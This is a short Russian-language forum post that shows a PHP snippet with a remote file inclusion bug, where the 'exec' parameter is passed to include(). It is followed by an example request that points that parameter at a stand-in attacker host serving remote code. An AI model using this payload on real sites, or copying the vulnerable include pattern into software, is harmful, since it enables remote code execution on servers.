Показать сообщение отдельно

  #5  
Старый 04.12.2006, 01:31
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию

Бажный пример:
Код:
if ($exec=='main.php' && file_exists("$themedir/main.php"))
               include "$themedir/main.php";
               else include $exec;
index.php?exec=http://attacker.com/evilcode.txt?